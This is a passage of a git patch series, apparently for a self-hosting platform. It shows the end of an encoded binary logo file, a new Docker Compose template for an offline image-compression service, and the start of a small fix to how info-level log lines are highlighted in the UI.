zbhACP7bK#TLAGa*Z99}9B@7b@Ngxq5>5KxTkPwC;yf8K%5yXN)2x6$4nCP)8vY2C|
zNWq3pv4m7pGcCU8jaYd0Nn9Kmq0*Lq*1m?Damndz=WJ&?WGV+3pLx7UT=fAf2cZ$!
zym16hNp#PpAAJ96eCA8vL08WL9r|Tu{Gp-d?&kBCEn8NNcgH>Fe+oeO=C}Xu97E~-
zg_hc}EphPCr}Ajtz;TI+<r42dGfnemc4E9_kZ}}h)ha*v(oSk_>wz&o2_hI{!GxmT
zZi(7{4QN2aK*A9i85zfp0Y)O31Z$6?X<}q;zGK}cUbAi!(z&z<{4!-)njY`pIO1zv
zu7Nm}O;{Wh3Utj?KSQ>?EkszeBzbp^4eoxXarFK_Ne23#JPe{H;c!b@ze!a_@~-w&
zYv+vc{U7=)e*Dwl@yvM(p)G;+n|EQ|mOgN%i5QZlv_R4Vq+qrrU|E3WKsYu@+lI7l
z7PbW_1(p)51hEuMBsu2062&fiROgGws!Uwx)?yE`5B8Z-140m2t8~DAbI4Dpd3Ut{
zWm#kl!z3NFFPOu|^CN;!0|AihleN021l6Sv<E|tjvM?6{#`DlLt(!a;R?6ni>D@pW
zM)Uc7(v2r6#f_#V-1v#2a)^YCK1eX6ASTHsFaX(L;Q-Phk`@6LAYyMo<q$}Lqy$MB
zG3{i;UuKx70umw`drAosf*~a!1;=F=lT;ufV>$8Yy$WR!f)HkWlm#<2cXwm@35V0H
z(~qI9BM(AzX9p<MFk>U&e33{AkR?H+Ajx8*HA4tEZJqe`mEYmdeC}&#>z!q^F3X@Y
z<hQjtZ`-nV?fQMx{q?JfuYC=oSgKxbJ6Y7qV_1CTL1>%3fXcNpu@0F`g-$%62c;UZ
zZ3!p}ao6(Aq^&e7_)`?)>Y%DR>yl`~j+C@9NZ7=WuN{HqW}@oWc0dB8jp3{Xe*Eu`
zqEsldlv1+xhr0LcU9oG|=9Cl!U8`cz!dc>`U;Unj`*yRf98oFdi`hitb9+vJ{<j7I
z05BH<a@Ve*6}?UFMdXc_n0=M)o*91qJHMcfyN6*lWl*XHxc$%fGiBRg3=zdQpH`BL
zlF&+#QIfS3td#;R#jqvAw!q3_C<U?<38Cur+ju@4aZ<T%lNFZ$A{MFoM~ka|2mr?O
z(b+p4oeTHF`k{VylMYw?0NGj7V4Qe%B_{c=6Fk!R&%`@8$I6gVqm2X!AwWWajRtH5
z<GN(0k~D4JOdt&R!A06f7SK=%G!j|sFq-IFBH~k!1PMt(DUw1#kc5DYK`9C(R3wcq
z1fW!uiAjs0EFvkR=ZjK;n4=uO&)E8~j@v<_C9xnvWR*sB{IyV$ND73ZkFZ*XDHg%y
zGT{3l28lTEM0XG~h~bAGsiqdHl7;tN{62i~itkc$?=0<WPx!jvb#~_7x?{_Zhkz5+
z-gQ3^N%0}P`e(hDNh@`PV<kde84+i^{jEF}N|5XD*yt#oe?%{*YzM5FT$}k%k8Qws
zO(B(Z$=6Y079l+&AF$XnXHr0lz?uz`NkJQS4b!$E52=)cT3{%fNyd5&ihK{a>-Im9
zN+wwc0VK@hs~>%|G&Yu>Cxl42sf2#&nU`_%A8$pjtwVd&vQ$!hV&~3H8}|g>{cjEc
zScXV8ZuPdE_hqu~DPFmMvkpeAbaN|(Mux_)ahtNd?C!fzsFYYFQh<;QvOv;-Q3`Ac
zuqDVSMQkYwr64UOLM6dUKugI+SZt!3Z9@FQkRTJo=25>jQLh8`(C42z0t8}sX&o61
zW#f$V-$IYA*#So-z_vuDs|_MFEMl&BUGJwZ9%LFUzD(5WWJ4n6B}6+YDCV#`4hE_v
zp1Wi*w|4Zv)M^lW*8fwsA4L8Gb!mZ#BTD|G=5!PUSqhMpT!%&*f!K3_7>bxBMLWC%
zvm&q(FjBC#6pXE4q>ON}WI>RuXZ|sFK%jok>pBCW(a>76i0oY_y`v|>6EPDpgn$$Z
zLdqzE5Q<1p<8?t8`edYr-P4Pwo?n9#PJTPzbo*1>(KR=e%+h%IQYPiRY5n^3e`00@
zJR0tC3labeK#)kZ9qd(|Z>JJndTeO7Jp82Nuwe1=G(1p3VQe=}I=lx>9qpuz;bxck
zua9n~-35hgCIw%|uq(vN9-@AIA}h!!_HiJ9Kr$O0^0P1Q;+&fT!l)UXNk|w!L~Ba$
z`j=nE%g?>Y>0H_bK^00`_XD85fxdR5wQwAp`v(Tu^NnXXRD|mF#qqvh@2j!-zd8WK
zhXx?G?A-a>!i7CYT4C^`pfX(6m2pdizDOrstY5nozqsy?P+eW9nSfwLH>?l}BqWoN
zh<64SQpV|}00~7xSP>{h2#yyOM_M=WO<A|ysyELXRjRQk-+zzC0Z1vqW5aa8o8Ls+
z+tOG&IE<#YHYjBwMvqL&Qq|!@s8dR#y@H71!X(BQG-8j40cqj6&0BETDJMZ#3dU%>
zHcz=uRoN#4jbl|DO!y0t0Hh?63M3VTRLqtIwk(2WfovO43Q*C%qp#!hEd<pyO`<GE
z0AzuL1cV?G0xTk?9*CfghDxVdrIPTx8nl_r#N+Y{Ci;024QWAL`3wx`AV3&~fRL;@
zXCUvV@Z~Rl2j`sgR;=6JhnB8x_G-Q=7xRM&DbCorZPR`A`o7^ji1;xE5VUl392GF%
zmrbYBURa`JbDBQ*<*%Y|#G~TqD2`gtga!NeqUwT+VFkDSZ6yZAfac~Tf>1+7Ey&5}
zWI|Y$h)|1ll0N|mHMJ)sJ^R8oDtSpbwgt@$seN`_2Q|aUSfCqzc>{;O&umz+4vM|A
zdjAT5gPNaa!w5rT948sV!0{`EKNm)}{hKjnPfWwa8~uOb&;Y~>FRULPA0PfiYm-=-
zvh=sOI$mZSa&yZ}^Q~`Pi<N8EvfJ6oK7*qAFJA1?%^20Z6Sb`(qR4dyB#B7GP<SF@
zF`>s($I92iwNximPwY-pP<B(w0*Z257|%ztImM@6d?D^#w+hWIIgruOz$Y&CnIa@2
z34)1t#k$}CO_l;g4K_5Iz(NY>Fyw8+!#L}Lvw>QX_S*d$kN7p4=+lG^S&ToMh&%Dt
zG+7oY$xxD6N-~yYZAoZLl2MXbNwB5BN`aMRD1m4T2S`X_L0~~JLQ)iDqa7R~F0TaO
z>i{a7!<Mbv=+)J0$(cTvWHJfOj4%vfLJgxMkPnOjYXhSr`L{5L1XS1<l9?=2M>__}
zKK<akKQ%`kcQ(HLy<b73I$&qgrd%r!K|iwe$Yb{(8tPjfFZ8<LNB#O40O5rfUYJg|
zc7Lu~<A>5sZ5@z-F6R63$#4HV3U(WYMv6FiNe7NPWIyO)fVHn|!)=djrUIvtX>wtF
zL|~t|bfc)j$F2?7E|HF}qyR&QhPslH*RI)#m$wJp-rNjh3=9LgBq))#kxnSuxOyZ0
zbm!g3baZLIRw37tH?Mr|v7G>rZfe?Jx(OzNChgn0R=wj3XT1A@`28^U5%mAJP676H
zn0O-=J9g~YM1;$GTBdEQRjSu2r!6RYM!fZskK)05@1%}Q6M}LPO3B!UDK0vhB2`M%
zJL?VGA;lQ~c=1H}B=clJT$kbE30D1Hb#-G9n8*wW!m?q;hH=Sz-bEk!!>wk+&@Ngu
zx0`gi#*iQ~6WhZC*eKo=Cg(#_XZajRz!*(VI)&wHRv<fXHkK?|LV9?RC;asGd_D2!
zNg?|wFP%l40*LxwR3K;q#n#1KZ%T5sxyP8tcn3!epo)t4sEsa}1vLhixSWb1hcS0L
z41KmzX&R}7e8Jm4gn`||blJx)!<na?h=Ud{f=XHd0-)wi;n4$#G7dWl7)D`ilwW=3
z72I|A-MH(|f5WC71xn|dO-oM?`GF5;Kndc&_ghvy^~}ZX?Xw;o9^UrKBzrpIKFyzh
z$ineTc;3Aay>uy5%e+jsiSwg74F@&(#czFwyXGH-_1lIpXJ(ogF7CmKwY#xlb3ghk
zE?QcrGy64!z7HW(jJ=M}wGb49jEwZ*P$W601fT+glqIoiq)3mvnny=VD?;r-2npX0
zF)b(2Vk>kD;;&!*15_$yYRh$zspNx1Li}_zrgu~*F`G#e1^EP<%1=t8yFa!EKW(q$
zwZSa^yAKgHX2?$^a<`Dv{8lT~6pjyVS4S+JkH7rskK7_W3Q9#tOT~KYh|yM&l&6lw
zSV2NW)b$CaZNWqoIkLn%<P;^|czp_<B+u<N378lOg5r&ZLmfi3w9!+4dyxP5g|Fl4
zFMSTRom=6;iZ$~lL_w*Z?viPMg*LS5qbvakjE0l#!N33Hr~IaCzekIf9tcw^uoMkh
z%4-0Y;zS^BX+~*<V2)6V^==h7qSa~>!Gg76j@9jDERA5|sv)Y)C!iD2d5h!-W0-}A
zyC`C!;sFr?uLi5R13LzaxZtgq@XB?AkVv6c8$c@M(4zhK=aWu2jONbm<wFiy1lM+A
z%Ow!A!R9Ty_?6Y0Y5n?*{M-vKVAJO9V8ci^br>tv3_tLt(V=E$!3>m2MPzeXl3;{^
z@3S%MT}y5vGNnNK9bV1vl9oMBIjMx@xG+HwjtvdTS^Lk$C%*m-q&g3vO}ocfC2X=)
z2xjJdsZ2?7(c0XE!NL#=?Z8Q8NQasUf^?jD6Ts!FPt$V&pMCrS8uA&+FefaDs$Zfz
z?qAO;(MFCXp_y3;L8FB-4xQ)X{6nVWzP~N!H=p-LO1E~0fKWOZTUHv{{uX8y&p-dX
zJmIwSR~x2W+Lj+58QOev+;G_E&R;+NUkw1L&uZt-pWnJ`VC+TXW~L_+IX&LLT^_P<
zrup--8>q9rm1-mX?ATUxzlo@|6rtQjy{E^q8PmiQ6Gf(M6VShXG}Nb<cm5+(V7%=y
z0Xhs=we`?-|M7heUw#pnU2*{h>$kvCR!rKNRE?aV>`nfSM(!vDVE}919RBOAf1~n&
z^Z3HcKM6h5Po!kDkhw7sO$|_cN(oN57)=C#Shb4d1#e;*G!xxRhU><s6e|W%T>&?W
zn^R%Z5&nW?y@KIbnu-0;klo#djqA4aId6Oquiw&79bL1~+LFP#b*~bngpx`4wF00F
zEF~eiJ`{*vxv!bDA2PWKlSySc;ikwKEyFN`);_e>6&5mSK%7gb_`m~~(8CWut{KdU
zgsqh864yBe@kJ#zC=|v64q48cHJi?O+eJ9^yf;yQo=_aFaKf>`<dJ3r0~bO%P$EQE
z(#P+w`3Ya};ZGu8&~Yh7tYZOiNdlvV3J#r{#8FFnF;X)~*aGa8aoa;{VXS5(EjJPn
zH4GMnVj+(=9X}llT3kN)xU;Zf!zQFMZ94QubuJeix?|Ih)d2Y5gOBOiwqxtZ+gmd~
zTDNXpU&A=_AF2)gztRKP*I@wA`VH%co10S?i(1}i9Z++7w|;T;b~^FwcjBp)o7tT)
z6M->^Y$ipt7=(z>?^I7u0Rf7LK|~z8YSw4v5SaS0rx`3Txus6|ck~6onu!gRkO+r|
z%=<6@G@QA!@aM;uvvt5+gv=b)6@;S3S+w9K!AOd*3PO;Ul6(RgDPYZ=%YS|FN$hM+
z@r9Rv4tjWiq!27jwBjQ{&pj4@y^j#Ph}B=}RQoc4iL^B`Jc-tJ9UDNzQiuqTBx3hV
zK_H5h!&t_p)kLSC7?5$WWd=#o+CT%ar_I1!cR$1@oqj&A-?&{QQaSq4cfO3P{_s0|
z_6Jw-p~oI?Tm>XEt!QeS$;n(V+u1I5n!0teb$Xa+oo<>sXPAyzbE&1RLt3`0!b(AU
z<^H^`?f$Eh#S7-l?mmixTHbXO#)k*c-P2CLz4JzS&Ku8EGpBd5uGX|)HDS5nht-nS
zUMbLNN178)IMn*gmH#fjaQ*MF|C#T=*6mfUjaQLM*Z?z>PO!rn2w@NgRh~P$oqzGw
zFR{+&;U=5l`CeoZ%yr8+1BQeM4Q92cPz@PLDcJZm-2Tu87-W&M9X1hy_5W+{%cJb7
zs=R;uoIAX+>b)8>CnS(SLI?^WKq5#p7zJg}2+O9C77XIjUSI3iqOFZ$12WiPD|WX8
zKcEo>t3?LkV-g8sm@*ND%ps{%s!~Y}@6{Xcz2}_Wf86(8y;M~KjUY6z*UGBYtv8%I
z?0xp|+rP~uEG`>`RNC+{6O#OcYkq{6Uw)O+O=+crL5ocJ#;&b9U#aTwr#^M+?t#AU
z%j%S0zn=2rf4K)x6$wC(Z)`ieXw<J|w9%5WMqL;h5Yo@#+AIHwF1_>ua6X4}vB*(r
zg_~-)#f3QmA_iIEJmK*78rnzD81eLhxc$fS28NF_48s>pPE#{K_>=#Dy=g0sJA5XR
z35SqTtOGA>br|O7s5k}^WLu16lsv8Q`0t-aSL+16`08(yER>j7S3rW*IHk@Ds9$r%
zD;UcQKm}FJ!&Q%Jcv3NBwNRz@nYAopwMlZ{5=rPI2tiB)W0;j<ing>OVBq^#UB_2l
z|5IWg+&<|LeEmoNLM?}W*mUh0qL#KapbDHKpI-X?6Zp|J*T9arL`Eo(wp5UV0N~gX
zN|^z$*<=alc}wU&2~m8uclYkjYDsm{q`4Po3gu;1G#X^OyX+-j_&k5*`fJeD(~sQt
zUif|%eSN(EENX9`%uXVLc-th}on!7B%!30DuIpA>__>nPmk0t6u**1fN(<k5)z$R)
zU3cKpE3f5)7oCYrCPUJ)K@cH|6b4!mjLGq*Po7B$$HqW0&%b?a8@Zwpk)&az7=ROQ
zI?|?r>~22mr0FPb-9TrYdX7n?QY^G4ubka^#9@iKD^_eQjBxR*?S*fEf4F*w-Wy^8
zPzSX&oth2guT``uWk(`D%Dz3=vy0CC^k4DS*Ir4}rcZ<F+67|G(h)WGm=IhO=0j_c
zU#|6Ky^f3jKNSPRh6Brj+t`ZEKmG}u?!6mn+hA7vp@=yaK~^a0O*MR$fFYEMMQrKr
z<yShlV&a*L@sYp2m`tVzWC9TE+M358F&HIv#S5;n0#Rj(Q8hrXv<wf^IaD7nu60L@
zFnXiDnk$H(Kr^J9fR%2+AD?;}|8)5kSpM`%h7-r4k1fWzU;8GElSZLv$gzpF24+l6
zQQzk0%}>64Ep_hbA<GsDnyqp%vr}5xua@)qfn+kNrcIl+W9{0t-Pm^+kErgBLXb+P
zr{5MB^Z96^-S6MI)0uh9A^fF(z78!DX3?I$0r<XwZ3`G}5Ga9i5T1E$>{qqP+YkZ`
z7)v9acF-R6`KIsuBdvVo86?|d`0g!tph)95P##s=lnt1r6v*XEG-aZ|XO5eJb=&sh
zku_bgoFp2ggf?NrT8J?d@H`*sq=!!&J&w;<xR`eB8RUkjtGq(iwh8C<^=<$4*bPhn
zGkLEV0E9+>)T~)E=XUMt{eOvM+tJ#JX%-d+x?d9$+T-}%72l={Keq&yF2Wn!3z9aZ
zv^Z=gw1(5ARrDV-i!j|i8umK|3()HxuRTQ|CIPLPt%fA2Ai$Ot&mdU&B9gGt=-RMk
z00U++pt1*aXZktNVEaQyi&>`}$I(<0dT@w@6}sOc8mI0nM`>c+)Sx=$M_mX&)gFXV
z>o;5hAcu(xuBtU^qseQhUU^Hka-p?iDIB8K3Fz6rhp)cw-*DS6?nJ(rK~vjweCfOY
zz=wVGWMm44645v%5;4=7az!xE%Xj?vM*79FTVOjaCYfkb+AlhOIrCc7u|L+=w{7!?
z`%iTtZT&7t0BGsbrIEXT^XQ{2Vhi0!EEvr6T8UVcmi+C7eEg@*BF||;vB2=lCDz)I
z7ntD!Oyx?tQX&zJBGK3cAu_ye<zv+G<7L>sxtnE#Fnhsa^wl3O<4v2hWIHmP;6NfQ
zqS%58gC(54AdNyn@x!aTD3xwuM}*Cmg6wb}c%}AS^78oj@#FbB7cIr|KRiR})|P;a
zS=;!9pXY~qE;fe$Y~{y$%mAS32`pWDM(pliK5;E%%U7IuJ1i>*N`-=z>F>eGCm)aR
zedilkwCHG{ltFnY2WeSk3n%;p28T89(EAqRfG+*$a9}JWFseF0)l5G_gM@7Zu^2-d
zlzRFp=*>dr2cS!3kTy`!80;w%I5BwwU`xVKfy>%Mq{<)4#5H!AF*R}2IxDm6_Kp9U
znZ-zu6RI}LR9`YY1GPQ^7$&<9*}=4i5CqxO#^nOA?6y1c!y9ix=gwUKNm_WyDfsI5
zzR!)5r$VuBS{j?FAqi3F&+(%jcj4w6eoUR)ccEe2cr8g9_5<6f@;cJRv$NSf+bRgX
zs*=B++e-lW%rnnSEr0seo0SnuoMfC$;Ol&UpVc<Gm5)1NA?D3L9xc;nQ@pJm<VH~}
z7Q=YovS2$dN&~$-)Z0z#S3bjkTK*I^t$hV{G)b{UinHBablH!u$M_>pMSpJ=!j?>^
zPC{g`CfEQ)T*EzkJxVs&fFTY$o`@;zjU-C|xzZpXGj9_8`nn(R-M8LNiAfVoP|6G2
z&#wFU$;T}0=;$cEUUvVD%6rWKpz0P85n9vZ&MpOfy&Fl)Akn}iqb4)7Ls;z5XV3XK
zf9<OmV(y3M0mTCOg(3t|WgcD)j2~92$BOMoD*Efk|HHpmrgeo^Kg6_Y7#K3Jg#%a;
z#<DA+w}E6I@I9CyfMJU*VMAF=meLiaqY<}~x%PO3UACjD03&z*s?@N^`>q+Nq{^9w
z#~o75Yv6GD7z2S)aGWTpF$G=9<G&vGJzxK?w`0|+l>jpxJZm;C`TCc!@T?`+T__{s
zMtEvl5<FDKgTJ{4Kl|x2Y}>pQiC81zZcLYhqGe10(B*$yeDb2pIyyS?Z_@P@01OF%
zrq<ctEc%7-OE+alBh4yT>_s`(C&-Z^9&s>b%4BYCZ6P}nM?*sc^7%aHhYIN0{u=sw
z`b^2wkcqgA#N*If!7F>1FtL@dT6QPa_ZUhzfDYN6!w?`u`c~#n3RuF2(wa$Fl`3yI
zq*juI=jCzeoMwLP)*sQG*Z%^|<0t97DGK8i2ijxy{LapGuZ_g>|2gtrGyte`2ledP
zlbU*Vm9EgRmx^fGvF(^)X3q5WinK%gne#p=F1_SJo_oYhKxe6(A7oN4*}?{hSO{6I
z>F=vZ`%`x8Kk+vDXZXj^8>n=|gmi!y*5HuyW|*^Zn3QPDyEhze?3)A}W0|8a+E^h#
z9X?@S7E4oEzagU(j4-ewE+gKG+&~!}zqy}ozT;Lr_ssJEqG+2kg+Fut=lHyfE+wm}
z8HI9*$ETw-v}X@Je((MG<<IZr4I8(z9gA>7W1~@lZ=13Y3jAjsTYjUzf6E_hdCE8c
z@K>Q<X58c{M`eciN=wEUyHN+QBVgfZqXI4#@*Mbn2&pz8Anb~aL~JV(wE-g#C}oV%
zByF2=y*u!Q%P+$bAG;WRI|tc`*~2;1ikD<6)J1~00&%VY$^?PPf?<YMB|dUa8y>#>
zU+I=>Zo;_s*;?tWDU~x;!V#bB?cMg^7_j9(OWvynpei+QVEW|AM-2>l-_mS<+IFId
z#goeSfPwx_nMg={?6i~cxzC-AQ%+ihXf#g9<q>#36B&|Hpa#LOCeX*83otArmFNJk
zsrDR*{k^`bm~~~nee{1n-H7{>5!K3JI53a+%;Do)f4)p06)09p!*(6A8X5rG=FY7<
z=vR0D4tL-6TVC_(s{lNTHns34KK)so|CRrP8FOZ!R0c@_?%TGFANxfI{r0{Gux;~J
zL>tm3o=9reMaM5?0K+}D<zDlHb1wV$OK!d-c%yagHz*Q-7D6D^+<cnv;{vi0A7w-)
z3L)S)Q3&BcYgK`0Dg=QKV@f&0<u&nmbW5RVE+Ek;pp8hRT)zB2e@VOgZA65qunryQ
zR#cd*z#!p3K*0(Eo_<go_b$7EezojBkRErik)CGX@0ZFi{B1F}_qMlM`SCt50I2r{
zgdj|8pL*I*F86)uL>G|L1}7qoQYG&1+bfvMIQHnnasD~y;EYdx0#gp2P6!H&+z<uI
zL$w80)NusX2s@ZYhXrp&-e@TCW<F!YOGZ`zYP7mwu0fHiR8<BrhGC3hX;~!V4Gi0+
zq5eVq@%fc}&%M9HqmMm>uC7i1l2WY);jGV|g)_c*5vI;N1U%@YZ)YdgzVIAB@xcGb
zGfzH?La_k1F=gVhI9Mqel*<rY?zO1&lNmD(`}qqmEZ<#O?pu=Z8X+~591&sR!cU~v
zu6=H9b92+-*-UX>v7j6&rL8Flno`N$z<AF##1pS}?%1@+X`1k#VE1p_XtT=nbX#A(
z>I$BD(%I<i&cbrUFm$vghU<2a>K%X}Lc!BW#a$fI?D0+CyMq4k#M7K;ZZWp@p}dUL
zL2+qmXwS0B6tA~b`SCt609C0rduSm9TGHvW{DA*2?C3%nO@l-P#^|7s%L>2LFWOp?
zIOU`haNe0`<M?BbLescrzyySH7QSC(0YO4o6=v5elQY%)K43o>fdf?zFd|&Qe!PJL
z<s*Qxs}&=T*MSVVJ`XTl$X8%+IA)zyIASr@Oo%0+vIVSM^%CxT@NvHX;YVo0`t>mI
zjg_20#~d{ur=NK`PC5NFjGH`#o?h_`Klj9PdSS&1Y~Hv9eSH~25IT`a!il&xYXhx4
z0L2Z==JrEoAAI}jr=RYrEcxwF{E@QX+WCmaZva5D^^gk!joaO5O69Wy)|{hf^55Td
z2exj`ljBGjt_@hPcc(^vGME{qa)9v@(h!BM_}S&(!umC@nYPxc+8DOA+QS8J_vg!*
z%pKL1<hSGG-%kdhDz%4-nW?F<@ib=l3$PQP5|)fOb`+K!RfS@SbAyADf&$Grcmh6p
z(jr=X+Q~fss3S08QcIY-D+l0G2}=1DifzHtl9kAQI8@))y&r2d?1*Dy8G!vM_x?U}
z|H5E~sbvZ(UI4&G>yYbT8%W0@=~|3vj36Wr_2;nem5ub!Lyz+Bm#@G}>o!nHTa0*`
z+S<oq!TfpV$hk8SjW{ARFo<WKU&&jxyoR2gJ41@ENL0H{1W`L;0Sv7?_~l}ONImJe
z_U$LnSn#`!XFE!D_vo#1_ur_{h>k!EM_N-YU`M&Jea=S<h2jIzcq|&QAt`Ke&983f
zoJx^jmR#$D0EnsHZVeYJ2!yiFuq=T?CO2W*^AF?3%fHL{l0-|oB~YcTqkOL~)fl;G
z`}Q^Wha@GVcnaRqlYYNS%@7D8OrLz%?0h+Yfv3Fl7|v9PI2=0(NYce}h6_UjA|jaD
z+nRXZ5i{wOlTN^*<BrAj=~JnptvU4a0uQE;V>TQz0)ru>tRRYO{4X@tBUbSsMjfvF
zR%->^CmcV}4cy05sDS%xIR~z^)>iZ%#6n1jM4aH*fV5zWWpwWD;b)&;jfWq30;^ZQ
zj4fL_Q7Q!x4Jk^*njkD2WmV$FR5Mb^IQn~cabN!+qgaHUY+%Q6V7ZpG1d$E`m_UOS
z7r<&IOZ|{5<oyE!J2uqqvhRfAzm6Pb1FM2bhs--BJ6L>}oM_r;WlGrr@$H*`&gp}X
zrNO;f*tW~{bXyEn4X41QVThnL!5D=}tqo`}L;PR={zJOAqXV&)DaN)M40{8XQ2AFP
z31`Xf9h=v`9Wnn%c|RL~s_f$eo`3%N@h6{r@>H*=K5IaK#jevXEgOy<193u^N+ll3
z4nnE2NT(bzaa@{@oHrW_jyf9i<{g1KGp8fn(gL`G0FO~B0)c||R5&XWA|xG#0g(uS
zMimJ+da81MRFOlYns-nMI?V6`S67eUH^IkjLc}8*hG7CU9NS^oF5ozT8zU5bsB*v?
zw{1sfPcN1)e;UuNT8&pX?ZlqFg8&nvu_R*ggkd2}07c9KqEg1<KtlyexDkhJOTw^*
z3Ouk;P(cBLO*dKcS&PIY4bACCcWz#{-I&@stGn*IO!0?9#^$NBPAcRJ_r&bxlrpUI
zLs|LF8?NIi$1KK<9laEdMHpt-2jfb!lw=8JM&1k}5H?y;Ef|*$_{E3r!d*ArjGo;E
zPPMfglCV^%1QiV3cG?La`uqFtyD#&0@BCHyzyJ(O6*{U=QN}rQrnPr<4W33sOAMU(
zBpSyF+X{&$EeFOxDZhk5VJ~UFM3$6v(6q^zFkw87UGQN{ozRX2$InM|DvinG#{;oQ
z$oXGozxB$1?=!RtJB-+{)|zxU8mv;QugBTe<M8W2K457{5>nRXBp9%4MkGd%R!9^o
z1%nxTyLV&nU>4iAZ>LpjUgGtyZow-XHly>kofyh_kRk#*7GWnAH?9*2nRdXI_BDiH
zXcV9-1RVfFf?!)Vf}lL$mAt`NJU$4bmE~e#dopSL$+l^IPj`2Jopw{*ZvU3lv)@9g
zPFB@I5EAM3OMESEh$Y%$<y=`CLGmANxDHc}T!hZf3~akH$hArqUjbS9z5>{0$FZoX
z#YW2YvGw^U`JUT;hIKD&pm@4j$Kna{y`m_WhI*o)%d*+dJ1X}3Evxgto_t^cMoT@U
zGz<}hz=FdMZ|mwCTu}1zr;@Z6DveoEHpCTd2v>qgKtPyMp{#w+gI_KP3yP%8)RIo&
zkb@>7l}_=z!w;kBQx2j?#Kp9!Q!r`LBsh-6Bn)D%g=iv1aNSUOA!&F?T=%ag!z>|z
z2U9GfP$<CHhK<(f>&wuV&0Rc@%hF(fKUS<-$pe`jclY#SduKN(%@mZiv7?Q!U6&ol
zF_tAI2xPP(qXV#JNWt)fd=X4tM(fp%BX-84&I`MD_YP`!MgnMQY04jZ=-lpEv+}*S
zEL$C*!pT`DvTmn;w<$g9LqZ~8>cPj%8|WXrQdoS3F^(SU>!WE$Oc7tY`UW(%%tp`d
z930mQ+jaqHqoH*O)rdrFBw{Yo2@9pYop@=*AMnHj_hG}PPFONxQi%o=1c4O<{jf#(
z)=A@{-+KAw*Lv$K6Mw0b{=fhnSg7u%nCc;BBaS`x$SK`B_b$)|$L77#(bBf&Xie!z
zq#4=(PBan{$|<GTuqoz-Nb4Y^vMPCkVW^?80f~5=6f`6;+ENLOA3q+A4JnSeE(ym9
zxe35z3Bh8RWQbrGN(D9k!l7&id-wEHckgb_c|MFG1inJ4=yBQe7`6lH*i1wmk0lXx
z(qyz2WRYNKDCNT_AI6lxN^8f)PS4A2jX3UV-}hFhQpx8W$LZd>b&Izj9MM?Ujq0x5
zyUD#DB?LfN7Fx&6J)z{4mKx@B$#N}=jA}?F<%yp;7av)2E@z826|x0#9S5v61Ob*1
zh`KH!5r-uT@cOsY=5=ea`l%II^}<>n92n$CJZ=(+W|j=wFX!NU*{708`|{phTbKU@
zD;{H>_XqOEr2e6<#by<H0i1aF+=;!p+_Ztg!9}*?9Of(i;ehQnA>DS(gh(U-Kp-$C
zq|vq{{2&M?z6hy_2qp;F_dE)G1+9ZHu_&s{fZ^PtIuvdwA&oDDZNs)57PbZHSi~R_
zB&6%Q;ewS0Ndg&-!1tj1a%J$i=?=VNHX3m^2Z8@$ON;YTHd}i6BOjUDbN_wIGZ<Y8
zlXZ$cQpR*s-o-)yuz2y}<eC?^eIuJIT<ApN6D`Yumcl5dO+!OkUi^1orrF2OM}H>I
z#@KKiix`@f38xpCLJqq&tjF$MyRmNVO6=USnfv=P1UqWt4Ncm0B9i^G(0&dudaZ56
zuFv$n^2-Y8={uVE{J;RbIiWGUgW;@}5MVYq@ANZTo_lfAq4{E_DHcu4>)o?wS~L-D
zw=8Fl=X(tx%dw=DU?LbMNExjFjY1AtGtyC}eg9h_j~Ip?umKwdCJjLhqm}l2zd&F=
znTYKv7E0@luZEhNnzr|4`kr^C%$~A%{>F}uM+b&^@%H&fQFpHUC6@eOE_C9FC(2FR
z_8vQw&3}!AIFm^V%Z)%-5kn%Ti@B0e-XO&zhAhWLB;pbiq3nAol}cce2+9F#V>q5@
zV9Rn@+rl!eAe9EIz}LF`m?VA6*S~VnLswjJg<tvZcVyS!=j7kXFMp4TsQbzLyRnuf
zaqYE#7yap#H#*~{eJD;^Pv5v{>%@U_A(BWm$J6Q5G(oD(_q|v#UyKG?TLx^|mTNO)
z$Q8mA5I7)9ay)7e*|uE-W56pFyMjRF6sdAULn1q=y|ruG`mMYCeBSHll_e?X2X)!^
zvDPm}?Bee=Wj~-00j=Yw9#_a0E@4C$OA%`~G75^=kQN{eK^iilS)?!~B!VDY2x$SP
zfIu4<1(3=q6%<!HuJd49Ds|7sjjLX+tI)jTieHrv48Yqf^$Er5wLV}HtV$fT@3@ZP
zUL30I_FVTjjNZBTC$erG)pxw><MY3eRPU1^0@@Cm-o|--eAzdPJl2aK#W=@`G%?!=
zWlUJ44Jp!KgA^On8z{XuBJDMSDz2K8avtB(xp`yVY=d`Yx$^@9@Xko}y3>*+OQ@rx
zW8{4p`GAb|z>Iv)Sod<|!}hLu@ZQBzD+8j=z<%+IOB>g$Su<(#=B}oaUyd_CzV<X=
wn@LmJh7O-G<F$t$et7Q~@L}s+T=~F%1H}Tq1s0IotpET307*qoM6N<$f_qO_PXGV_

literal 0
HcmV?d00001

diff --git a/templates/compose/imgcompress.yaml b/templates/compose/imgcompress.yaml
new file mode 100644
index 000000000..1046ead59
--- /dev/null
+++ b/templates/compose/imgcompress.yaml
@@ -0,0 +1,21 @@
+# documentation: https://imgcompress.karimzouine.com
+# slogan: Offline image compression, conversion, and AI background removal for Docker homelabs.
+# category: media
+# tags: compress,photo,server,metadata
+# logo: svgs/imgcompress.png
+# port: 5000
+
+services:
+  imgcompress:
+    image: karimz1/imgcompress:${IMGCOMPRESS_VERSION:-latest}
+    container_name: imgcompress
+    restart: always
+    environment:
+      - SERVICE_URL_IMGCOMPRESS_5000
+      - DISABLE_LOGO=${DISABLE_LOGO:-false}
+      - DISABLE_STORAGE_MANAGEMENT=${DISABLE_STORAGE_MANAGEMENT:-false}
+    healthcheck:
+      test: ["CMD", "curl", "-f", "http://127.0.0.1:5000"]
+      interval: 30s
+      timeout: 10s
+      retries: 3

From 1f5395dd842d6a1589dd3c4fcb8f0195c6d9d939 Mon Sep 17 00:00:00 2001
From: ShadowArcanist <162910371+ShadowArcanist@users.noreply.github.com>
Date: Fri, 6 Mar 2026 10:05:52 +0530
Subject: [PATCH 032/213] fix(ui): info logs were not highlighted with blue
 color

---
 resources/views/livewire/project/shared/get-logs.blade.php | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/resources/views/livewire/project/shared/get-logs.blade.php b/resources/views/livewire/project/shared/get-logs.blade.php
index 28d6109d0..1df4bae7e 100644
--- a/resources/views/livewire/project/shared/get-logs.blade.php
+++ b/resources/views/livewire/project/shared/get-logs.blade.php
@@ -89,7 +89,7 @@
                     line.classList.add('log-warning');
                 } else if (/\b(debug|dbg|trace|verbose)\b/.test(content)) {
                     line.classList.add('log-debug');
-                } else if (/\b(info|inf|notice)\b/.test(content)) {
+                } else {
